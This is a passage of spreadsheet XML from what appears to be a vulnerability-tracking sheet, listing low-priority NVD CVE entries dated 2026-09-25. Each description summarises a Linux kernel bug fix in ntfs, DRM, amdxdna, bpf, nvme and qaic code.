      <c r="A754" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B754" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C754" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98139</t>
        </is>
      </c>
      <c r="D754" s="5" t="inlineStr"/>
      <c r="E754" s="5" t="inlineStr"/>
      <c r="F754" s="5" t="inlineStr"/>
      <c r="G754" s="5" t="inlineStr"/>
      <c r="H754" s="5" t="inlineStr"/>
      <c r="I754" s="5" t="inlineStr"/>
      <c r="J754" s="5" t="inlineStr"/>
      <c r="K754" s="5" t="inlineStr"/>
      <c r="L754" s="5" t="inlineStr"/>
      <c r="M754" s="5" t="inlineStr"/>
      <c r="N754" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O754" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P754" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q754" s="5" t="inlineStr"/>
      <c r="R754" s="5" t="inlineStr"/>
      <c r="S754" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ntfs: only count successfully cleared runs when freeing clusters
ntfs_cluster_free_from_rl_nolock() adds a run's length to nr_freed
whenever the error bookkeeping condition is false, which includes
cases where ntfs_bitmap_clear_run() actually failed - e.g. a second
run failing with the same errno as an earlier one, or any failure
after a non-ENOMEM error was already recorded. Since a failed
ntfs_bitmap_clear_run() rolls back its partial modifications, no
bits were cleared for that run, yet its length still inflates
vol-&gt;free_clusters, corrupting statfs output and the allocator's
free space gate.
Only count runs whose bitmap clear succeeded.</t>
        </is>
      </c>
      <c r="T754" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98139</t>
        </is>
      </c>
    </row>
    <row r="755">
      <c r="A755" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B755" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C755" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98140</t>
        </is>
      </c>
      <c r="D755" s="5" t="inlineStr"/>
      <c r="E755" s="5" t="inlineStr"/>
      <c r="F755" s="5" t="inlineStr"/>
      <c r="G755" s="5" t="inlineStr"/>
      <c r="H755" s="5" t="inlineStr"/>
      <c r="I755" s="5" t="inlineStr"/>
      <c r="J755" s="5" t="inlineStr"/>
      <c r="K755" s="5" t="inlineStr"/>
      <c r="L755" s="5" t="inlineStr"/>
      <c r="M755" s="5" t="inlineStr"/>
      <c r="N755" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O755" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P755" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q755" s="5" t="inlineStr"/>
      <c r="R755" s="5" t="inlineStr"/>
      <c r="S755" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ntfs: fix kmap_local leak in write_mft_record_nolock() error paths
write_mft_record_nolock() maps the MFT record folio with
kmap_local_folio(), but the pre_write_mst_fixup() and
bio_add_folio() failure paths jump to the error label without
unmapping it. kmap_local mappings are stack-ordered per task, so
leaking one corrupts the nesting for any outer mapping.
Unmap the folio on those error paths too.</t>
        </is>
      </c>
      <c r="T755" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98140</t>
        </is>
      </c>
    </row>
    <row r="756">
      <c r="A756" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B756" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C756" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98141</t>
        </is>
      </c>
      <c r="D756" s="5" t="inlineStr"/>
      <c r="E756" s="5" t="inlineStr"/>
      <c r="F756" s="5" t="inlineStr"/>
      <c r="G756" s="5" t="inlineStr"/>
      <c r="H756" s="5" t="inlineStr"/>
      <c r="I756" s="5" t="inlineStr"/>
      <c r="J756" s="5" t="inlineStr"/>
      <c r="K756" s="5" t="inlineStr"/>
      <c r="L756" s="5" t="inlineStr"/>
      <c r="M756" s="5" t="inlineStr"/>
      <c r="N756" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O756" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P756" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q756" s="5" t="inlineStr"/>
      <c r="R756" s="5" t="inlineStr"/>
      <c r="S756" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ntfs: propagate reparse index insertion failure
update_reparse_data() ignores the return value of
set_reparse_index(). When index insertion fails, the code removes
the just-written reparse data as cleanup but still returns 0, so
symlink(2) (and WSL special file creation) reports success while
no reparse data exists on disk. When there was no previous reparse
data (oldsize == 0), the failure was likewise silently ignored.
Propagate the error to the caller.</t>
        </is>
      </c>
      <c r="T756" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98141</t>
        </is>
      </c>
    </row>
    <row r="757">
      <c r="A757" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B757" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C757" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98142</t>
        </is>
      </c>
      <c r="D757" s="5" t="inlineStr"/>
      <c r="E757" s="5" t="inlineStr"/>
      <c r="F757" s="5" t="inlineStr"/>
      <c r="G757" s="5" t="inlineStr"/>
      <c r="H757" s="5" t="inlineStr"/>
      <c r="I757" s="5" t="inlineStr"/>
      <c r="J757" s="5" t="inlineStr"/>
      <c r="K757" s="5" t="inlineStr"/>
      <c r="L757" s="5" t="inlineStr"/>
      <c r="M757" s="5" t="inlineStr"/>
      <c r="N757" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O757" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P757" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q757" s="5" t="inlineStr"/>
      <c r="R757" s="5" t="inlineStr"/>
      <c r="S757" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/cirrus-qemu: Validate BAR0 size during probe
The `cirrus-qemu` driver relies on `CIRRUS_VRAM_SIZE` (4 MB) to validate
framebuffer sizes. However, during PCI probe, the driver mapped BAR0
without verifying that its size matches `CIRRUS_VRAM_SIZE`.
If a PCI device with a BAR0 smaller than 4 MB is bound to the driver, the
mapped VRAM will be smaller than expected. Because validation checks assume
4 MB VRAM, framebuffers larger than the mapped memory can be created.
When the display plane is updated (e.g. during release),
`cirrus_primary_plane_helper_atomic_update()` copies the framebuffer to
VRAM using `drm_fb_memcpy()`. Writing past the end of the mapped I/O memory
causes a supervisor write page fault:
BUG: unable to handle page fault for address: ffffc9000389c000
...
RIP: 0010:memcpy_toio+0x7c/0xe0 arch/x86/lib/iomem.c:110
...
Call Trace:
 &lt;TASK&gt;
 iosys_map_memcpy_to include/linux/iosys-map.h:285 [inline]
 drm_fb_memcpy+0x325/0x5d0 drivers/gpu/drm/drm_format_helper.c:442
 cirrus_primary_plane_helper_atomic_update+0x98a/0xb00
 drivers/gpu/drm/tiny/cirrus-qemu.c:358
 drm_atomic_helper_commit_planes+0x626/0xea0
 drivers/gpu/drm/drm_atomic_helper.c:3038
 drm_atomic_helper_commit_tail+0x60/0x510
 drivers/gpu/drm/drm_atomic_helper.c:1989
 commit_tail+0x2b1/0x3c0 drivers/gpu/drm/drm_atomic_helper.c:2074
 drm_atomic_helper_commit+0xa77/0xb10
 drivers/gpu/drm/drm_atomic_helper.c:2312
Fix this by validating in `cirrus_pci_probe()` that the PCI BAR0 resource
is not less than `CIRRUS_VRAM_SIZE`, returning `-ENODEV` if it is less.</t>
        </is>
      </c>
      <c r="T757" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98142</t>
        </is>
      </c>
    </row>
    <row r="758">
      <c r="A758" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B758" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C758" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98144</t>
        </is>
      </c>
      <c r="D758" s="5" t="inlineStr"/>
      <c r="E758" s="5" t="inlineStr"/>
      <c r="F758" s="5" t="inlineStr"/>
      <c r="G758" s="5" t="inlineStr"/>
      <c r="H758" s="5" t="inlineStr"/>
      <c r="I758" s="5" t="inlineStr"/>
      <c r="J758" s="5" t="inlineStr"/>
      <c r="K758" s="5" t="inlineStr"/>
      <c r="L758" s="5" t="inlineStr"/>
      <c r="M758" s="5" t="inlineStr"/>
      <c r="N758" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O758" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P758" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q758" s="5" t="inlineStr"/>
      <c r="R758" s="5" t="inlineStr"/>
      <c r="S758" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
accel/amdxdna: put the chained BO when its mapping fails
amdxdna_cmd_set_error() looks up the first BO of a command chain, which
takes a reference, and drops it at the end of the function. The mapping of
that BO is established in between, and the failure path returns without the
put, so the reference is leaked.
Ordinary use does not reach it. The chain has been submitted before any of
this runs, so aie2_cmdlist_fill_slot() has already called
amdxdna_cmd_get_op() on that BO and amdxdna_gem_vmap() has cached its
address. What makes it reachable is that the BO is resolved again by
handle here, and the handle is userspace's to recycle: closing it after
submission and importing a dma-buf whose exporter implements no vmap onto
the same id leaves amdxdna_gem_get_obj() returning an object this cannot
map, since prime_import() types every import AMDXDNA_BO_SHARE.</t>
        </is>
      </c>
      <c r="T758" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98144</t>
        </is>
      </c>
    </row>
    <row r="759">
      <c r="A759" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B759" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C759" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98145</t>
        </is>
      </c>
      <c r="D759" s="5" t="inlineStr"/>
      <c r="E759" s="5" t="inlineStr"/>
      <c r="F759" s="5" t="inlineStr"/>
      <c r="G759" s="5" t="inlineStr"/>
      <c r="H759" s="5" t="inlineStr"/>
      <c r="I759" s="5" t="inlineStr"/>
      <c r="J759" s="5" t="inlineStr"/>
      <c r="K759" s="5" t="inlineStr"/>
      <c r="L759" s="5" t="inlineStr"/>
      <c r="M759" s="5" t="inlineStr"/>
      <c r="N759" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O759" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P759" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q759" s="5" t="inlineStr"/>
      <c r="R759" s="5" t="inlineStr"/>
      <c r="S759" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
accel/amdxdna: reject a command chain that carries no commands
A chain whose command_count is zero passes the payload length check,
because struct_size(payload, data, 0) is just the header. The fill loop
then does not run, so offset stays zero and the request is submitted with
a zero-length buffer.
On firmware without AIE2_NPU_COMMAND that ends at the opcode check, since
op is still ERT_INVALID_CMD and aie2_get_chain_msg_op() answers
MSG_OP_MAX_OPCODE. aie2_get_npu_chain_msg_op() answers
MSG_OP_CHAIN_EXEC_NPU whatever it is given, so there the submission
continues to drm_clflush_virt_range(cmd_buf, 0), which reads the byte
before the buffer and faults on the vmap guard page. EXEC_CMD is
reachable by any process that can open the render node.
Reject the request instead.</t>
        </is>
      </c>
      <c r="T759" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98145</t>
        </is>
      </c>
    </row>
    <row r="760">
      <c r="A760" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B760" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C760" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98146</t>
        </is>
      </c>
      <c r="D760" s="5" t="inlineStr"/>
      <c r="E760" s="5" t="inlineStr"/>
      <c r="F760" s="5" t="inlineStr"/>
      <c r="G760" s="5" t="inlineStr"/>
      <c r="H760" s="5" t="inlineStr"/>
      <c r="I760" s="5" t="inlineStr"/>
      <c r="J760" s="5" t="inlineStr"/>
      <c r="K760" s="5" t="inlineStr"/>
      <c r="L760" s="5" t="inlineStr"/>
      <c r="M760" s="5" t="inlineStr"/>
      <c r="N760" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O760" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P760" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q760" s="5" t="inlineStr"/>
      <c r="R760" s="5" t="inlineStr"/>
      <c r="S760" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
accel/amdxdna: Remove __counted_by from struct amdxdna_cmd_chain
struct amdxdna_cmd_chain contains a flexible array annotated with
__counted_by(command_count). Since the structure is stored in shared
AMDXDNA_BO_SHARE memory, userspace can modify command_count concurrently.
If command_count is changed to zero, the bounds check generated from
__counted_by may fail and trigger a kernel panic.
Remove __counted_by to avoid relying on the userspace-controlled
command_count for the flexible array bounds check.</t>
        </is>
      </c>
      <c r="T760" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98146</t>
        </is>
      </c>
    </row>
    <row r="761">
      <c r="A761" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B761" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C761" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98147</t>
        </is>
      </c>
      <c r="D761" s="5" t="inlineStr"/>
      <c r="E761" s="5" t="inlineStr"/>
      <c r="F761" s="5" t="inlineStr"/>
      <c r="G761" s="5" t="inlineStr"/>
      <c r="H761" s="5" t="inlineStr"/>
      <c r="I761" s="5" t="inlineStr"/>
      <c r="J761" s="5" t="inlineStr"/>
      <c r="K761" s="5" t="inlineStr"/>
      <c r="L761" s="5" t="inlineStr"/>
      <c r="M761" s="5" t="inlineStr"/>
      <c r="N761" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O761" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P761" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q761" s="5" t="inlineStr"/>
      <c r="R761" s="5" t="inlineStr"/>
      <c r="S761" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
printk: Don't WARN on kthread_run failure.
Since __kthread_create_on_node() returns -EINTR upon SIGKILL,
we should not use WARN_ON() in order to catch kthread_run() failure.</t>
        </is>
      </c>
      <c r="T761" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98147</t>
        </is>
      </c>
    </row>
    <row r="762">
      <c r="A762" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B762" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C762" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98148</t>
        </is>
      </c>
      <c r="D762" s="5" t="inlineStr"/>
      <c r="E762" s="5" t="inlineStr"/>
      <c r="F762" s="5" t="inlineStr"/>
      <c r="G762" s="5" t="inlineStr"/>
      <c r="H762" s="5" t="inlineStr"/>
      <c r="I762" s="5" t="inlineStr"/>
      <c r="J762" s="5" t="inlineStr"/>
      <c r="K762" s="5" t="inlineStr"/>
      <c r="L762" s="5" t="inlineStr"/>
      <c r="M762" s="5" t="inlineStr"/>
      <c r="N762" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O762" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P762" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q762" s="5" t="inlineStr"/>
      <c r="R762" s="5" t="inlineStr"/>
      <c r="S762" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/gud: validate GUD_ROTATION_0 is present in supported rotations
The rotation argument to drm_plane_create_rotation_property() is set to
DRM_MODE_ROTATE_0, and the device reported rotation bitmask is used as
the supported_rotations argument. The driver never validates that
GUD_ROTATION_0 is present, so a device that omits it from its
GUD_PROPERTY_ROTATION triggers the
WARN_ON(rotation &amp; ~supported_rotations) in
drm_plane_create_rotation_property()
Fix this by skipping the creation of rotation property if the device
doesn't have the GUD_ROTATION_0 bit</t>
        </is>
      </c>
      <c r="T762" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98148</t>
        </is>
      </c>
    </row>
    <row r="763">
      <c r="A763" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B763" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C763" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98149</t>
        </is>
      </c>
      <c r="D763" s="5" t="inlineStr"/>
      <c r="E763" s="5" t="inlineStr"/>
      <c r="F763" s="5" t="inlineStr"/>
      <c r="G763" s="5" t="inlineStr"/>
      <c r="H763" s="5" t="inlineStr"/>
      <c r="I763" s="5" t="inlineStr"/>
      <c r="J763" s="5" t="inlineStr"/>
      <c r="K763" s="5" t="inlineStr"/>
      <c r="L763" s="5" t="inlineStr"/>
      <c r="M763" s="5" t="inlineStr"/>
      <c r="N763" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O763" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P763" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q763" s="5" t="inlineStr"/>
      <c r="R763" s="5" t="inlineStr"/>
      <c r="S763" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Fix percpu map update indexing with sparse CPU IDs
Per-CPU array, hash, and cgroup storage map updates without BPF_F_CPU
or BPF_F_ALL_CPUS use a value buffer whose per-CPU slots are packed in
possible-CPU order. The buffer is sized as:
  round_up(value_size, 8) * num_possible_cpus()
The update paths iterate over possible CPUs, but use the logical CPU ID
to calculate the source offset:
  value + size * cpu
This only works when possible CPU IDs are contiguous starting at zero.
For example, with a possible CPU mask of 0,2-3, the buffer contains
three slots corresponding to CPUs 0, 2, and 3. CPU2 is therefore
expected to use slot 1 and CPU3 slot 2. Instead, the current code uses
slots 2 and 3 respectively, causing incorrect per-CPU values and an
out-of-bounds read from the update buffer for CPU3.
The corresponding lookup paths already use a dense offset while
iterating over possible CPUs. Do the same for the array, hash, and
cgroup storage update paths, advancing the source offset once for each
possible CPU. BPF_F_ALL_CPUS continues to use the same value for every
CPU.</t>
        </is>
      </c>
      <c r="T763" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98149</t>
        </is>
      </c>
    </row>
    <row r="764">
      <c r="A764" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B764" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C764" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98151</t>
        </is>
      </c>
      <c r="D764" s="5" t="inlineStr"/>
      <c r="E764" s="5" t="inlineStr"/>
      <c r="F764" s="5" t="inlineStr"/>
      <c r="G764" s="5" t="inlineStr"/>
      <c r="H764" s="5" t="inlineStr"/>
      <c r="I764" s="5" t="inlineStr"/>
      <c r="J764" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K764" s="5" t="inlineStr"/>
      <c r="L764" s="5" t="inlineStr"/>
      <c r="M764" s="5" t="inlineStr"/>
      <c r="N764" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O764" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P764" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q764" s="5" t="inlineStr"/>
      <c r="R764" s="5" t="inlineStr"/>
      <c r="S764" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Fix REG INVARIANTS VIOLATION on speculative pointer arithmetic
Take the following unprivileged program as an example:
	r0 = bpf_map_lookup_elem(...)	/* PTR_TO_MAP_VALUE, offset 0 */
	...
	14: r0 += r1			/* r1 is a bounded scalar */
	15: r9 = r0
Loading it triggers a verifier warning from reg_bounds_sanity_check():
	verifier bug: REG INVARIANTS VIOLATION (alu): const subreg tnum out
	of sync with range bounds r64={.base=0x0, .size=0x0}
	r32={.base=0x0, .size=0xffffffff} var_off=(0x0, 0x0)
What happens:
1. Processing insn 14 (r0 += r1) in adjust_ptr_min_max_vals(), the new
   offset is computed into dst_reg's var_off and 32/64-bit ranges.
2. Because pointer registers do not track 32-bit subregister bounds,
   __mark_reg32_unbounded() first sets r32 to the full range; r32 is
   re-derived from the offset at the end of the function by
   reg_bounds_sync().
3. On the unprivileged path, sanitize_ptr_alu() is called and, via
   sanitize_speculative_path() -&gt; push_stack(), snapshots the current
   register state and schedules the next instruction (insn 15) to be
   verified directly as a speculative path.
4. That snapshot is taken between step 2 and the final reg_bounds_sync():
   at this point dst_reg's var_off still holds the (const) original
   offset while r32 has just been blanked to the full range, i.e. the two
   are out of sync. When the speculative path later verifies insn 15
   (r9 = r0), the inconsistent state reaches reg_bounds_sanity_check() and
   trips the warning.
var_off and the 32-bit range must always be consistent. There are two
ways to keep the snapshot consistent:
  1. sync var_off and r32 before the snapshot so they match, or
  2. leave r32 at its original (already consistent) value and blank it
     only after the snapshot.
The whole point of sanitize_ptr_alu() is to insert a harmless masking
sequence that keeps the access in bounds under speculation, so the state
it snapshots should faithfully represent that. Take approach 2: move
__mark_reg32_unbounded() to after sanitize_ptr_alu(), so the speculative
snapshot keeps the pointer's original, consistent r32. The non-speculative
path is unchanged: r32 is still blanked before the offset is applied and
re-derived by reg_bounds_sync().</t>
        </is>
      </c>
      <c r="T764" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98151</t>
        </is>
      </c>
    </row>
    <row r="765">
      <c r="A765" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B765" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C765" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98152</t>
        </is>
      </c>
      <c r="D765" s="5" t="inlineStr"/>
      <c r="E765" s="5" t="inlineStr"/>
      <c r="F765" s="5" t="inlineStr"/>
      <c r="G765" s="5" t="inlineStr"/>
      <c r="H765" s="5" t="inlineStr"/>
      <c r="I765" s="5" t="inlineStr"/>
      <c r="J765" s="5" t="inlineStr"/>
      <c r="K765" s="5" t="inlineStr"/>
      <c r="L765" s="5" t="inlineStr"/>
      <c r="M765" s="5" t="inlineStr"/>
      <c r="N765" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O765" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P765" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q765" s="5" t="inlineStr"/>
      <c r="R765" s="5" t="inlineStr"/>
      <c r="S765" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nvmet-rdma: fix queue leak when connect backlog is exceeded
When pending disconnecting queues exceed the backlog limit, the
connect path only drops the device reference and leaks the newly
allocated queue and its IB resources.</t>
        </is>
      </c>
      <c r="T765" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98152</t>
        </is>
      </c>
    </row>
    <row r="766">
      <c r="A766" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B766" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C766" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98153</t>
        </is>
      </c>
      <c r="D766" s="5" t="inlineStr"/>
      <c r="E766" s="5" t="inlineStr"/>
      <c r="F766" s="5" t="inlineStr"/>
      <c r="G766" s="5" t="inlineStr"/>
      <c r="H766" s="5" t="inlineStr"/>
      <c r="I766" s="5" t="inlineStr"/>
      <c r="J766" s="5" t="inlineStr"/>
      <c r="K766" s="5" t="inlineStr"/>
      <c r="L766" s="5" t="inlineStr"/>
      <c r="M766" s="5" t="inlineStr"/>
      <c r="N766" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O766" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P766" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q766" s="5" t="inlineStr"/>
      <c r="R766" s="5" t="inlineStr"/>
      <c r="S766" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nvme: fix racy access to FDP placement id array
nvme_query_fdp_info() is called per-path and therefore prone to races.
It populates head-&gt;nr_plids/head-&gt;plids for fdp registration.
But nothing protects that pair from concurrent access - two paths scanning
the same namespace can race to populate it.
Avoid the race by moving this initialization work to nvme_alloc_ns_head()
which is called once per shared namespace.</t>
        </is>
      </c>
      <c r="T766" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98153</t>
        </is>
      </c>
    </row>
    <row r="767">
      <c r="A767" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B767" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C767" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98155</t>
        </is>
      </c>
      <c r="D767" s="5" t="inlineStr"/>
      <c r="E767" s="5" t="inlineStr"/>
      <c r="F767" s="5" t="inlineStr"/>
      <c r="G767" s="5" t="inlineStr"/>
      <c r="H767" s="5" t="inlineStr"/>
      <c r="I767" s="5" t="inlineStr"/>
      <c r="J767" s="5" t="inlineStr"/>
      <c r="K767" s="5" t="inlineStr"/>
      <c r="L767" s="5" t="inlineStr"/>
      <c r="M767" s="5" t="inlineStr"/>
      <c r="N767" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O767" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P767" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q767" s="5" t="inlineStr"/>
      <c r="R767" s="5" t="inlineStr"/>
      <c r="S767" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
accel/qaic: Address potential out-of-bounds read in resp_worker()
Although 'commit 2feec5ae5df7 ("accel/qaic: Handle DBC deactivation if the
owner went away")' fixes the scenario it was intended for by walking the
message and only decoding QAIC_TRANS_DEACTIVATE_FROM_DEV, if present, it
skipped over the bounds checking code that is included in decode_message().
This could lead to issues such as reading past the slab allocation's end,
infinite loops or kernel panics. For those issues to happen, a malformed
wire message is needed to be sent from the device.
Instead of duplicating the bounds checking code already present in
decode_message(), use the function inside resp_worker().</t>
        </is>
      </c>
      <c r="T767" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98155</t>
        </is>
      </c>
    </row>
    <row r="768">
      <c r="A768" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B768" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C768" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98157</t>
        </is>
      </c>
      <c r="D768" s="5" t="inlineStr"/>
      <c r="E768" s="5" t="inlineStr"/>
      <c r="F768" s="5" t="inlineStr"/>
      <c r="G768" s="5" t="inlineStr"/>
      <c r="H768" s="5" t="inlineStr"/>
      <c r="I768" s="5" t="inlineStr"/>
      <c r="J768" s="5" t="inlineStr"/>
      <c r="K768" s="5" t="inlineStr"/>
      <c r="L768" s="5" t="inlineStr"/>
      <c r="M768" s="5" t="inlineStr"/>
      <c r="N768" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
